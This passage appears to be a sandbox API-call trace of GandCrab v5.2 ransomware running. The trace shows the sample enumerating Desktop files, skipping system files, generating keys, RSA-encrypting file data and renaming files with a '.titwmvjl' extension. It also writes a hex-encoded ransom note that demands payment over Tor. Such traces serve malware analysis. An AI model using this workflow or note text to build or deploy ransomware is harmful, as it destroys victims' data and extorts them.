d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0088.441] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0088.442] CloseHandle (hObject=0x2ac) returned 1 [0088.442] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.442] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.443] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x21, wMilliseconds=0x2f8)) [0088.443] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.443] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0088.443] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0088.443] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\d2ca4a09d2ca4deb61a.lock") returned 71 [0088.443] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0088.443] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.444] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.444] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\") returned 47 [0088.444] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\*" [0088.444] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x503438 [0088.444] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.444] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.444] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.444] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.444] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0088.444] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0088.444] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\d2ca4a09d2ca4deb61a.lock" [0088.444] lstrlenW (lpString=".titwmvjl") returned 9 [0088.444] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\d2ca4a09d2ca4deb61a.lock") returned 71 [0088.444] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.444] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 80 [0088.445] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\d2ca4a09d2ca4deb61a.lock") returned 71 [0088.445] lstrlenW (lpString=".lock") returned 5 [0088.445] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.445] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0088.445] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.445] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.445] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.445] lstrcmpW (lpString1="eAcGdn.m4a", lpString2=".") returned 1 [0088.445] lstrcmpW (lpString1="eAcGdn.m4a", lpString2="..") returned 1 [0088.445] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="eAcGdn.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a" [0088.445] lstrlenW (lpString=".titwmvjl") returned 9 [0088.445] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a") returned 57 [0088.445] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.445] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a.titwmvjl") returned 66 [0088.445] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a") returned 57 [0088.446] lstrlenW (lpString=".m4a") returned 4 [0088.446] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.446] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0088.446] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0088.446] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.446] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a") returned 57 [0088.446] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a") returned 57 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="desktop.ini") returned 1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="autorun.inf") returned 1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="ntuser.dat") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="iconcache.db") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="bootsect.bak") returned 1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="boot.ini") returned 1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="ntuser.dat.log") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="thumbs.db") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="CRAB-DECRYPT.html") returned 1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="ntldr") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="NTDETECT.COM") returned -1 [0088.446] lstrcmpiW (lpString1="eAcGdn.m4a", lpString2="Bootfont.bin") returned 1 [0088.446] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a") returned 57 [0088.446] lstrlenW (lpString=".m4a") returned 4 [0088.446] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.447] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0088.447] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.447] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.447] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\eacgdn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0088.447] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.447] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0088.448] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.448] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.449] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.449] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.450] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.450] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0088.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.450] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.450] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.450] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.451] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.452] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.452] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.452] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0088.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.452] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.452] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.452] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.452] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.453] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0088.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.454] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.454] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.454] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.454] GetLastError () returned 0x0 [0088.454] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.454] CryptDestroyKey (hKey=0x503378) returned 1 [0088.454] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.455] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.455] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.455] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.456] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.456] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0088.456] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.456] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.456] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.456] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.456] GetLastError () returned 0x0 [0088.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.457] CryptDestroyKey (hKey=0x503338) returned 1 [0088.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.457] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.457] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.457] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.457] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x592c, lpOverlapped=0x0) returned 1 [0088.463] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffa6d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x592c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x592c, lpOverlapped=0x0) returned 1 [0088.464] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0088.465] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.469] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.469] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.469] CloseHandle (hObject=0x2b4) returned 1 [0088.470] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\eacgdn.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\eAcGdn.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\eacgdn.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0088.470] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.471] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.471] lstrcmpW (lpString1="fpvESJ", lpString2=".") returned 1 [0088.471] lstrcmpW (lpString1="fpvESJ", lpString2="..") returned 1 [0088.471] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="fpvESJ" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ" [0088.471] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\" [0088.471] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0088.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.471] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0088.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.471] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0088.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0088.472] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0088.472] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.472] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.472] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\\\TITWMVJL-DECRYPT.txt") returned 75 [0088.472] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0088.473] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\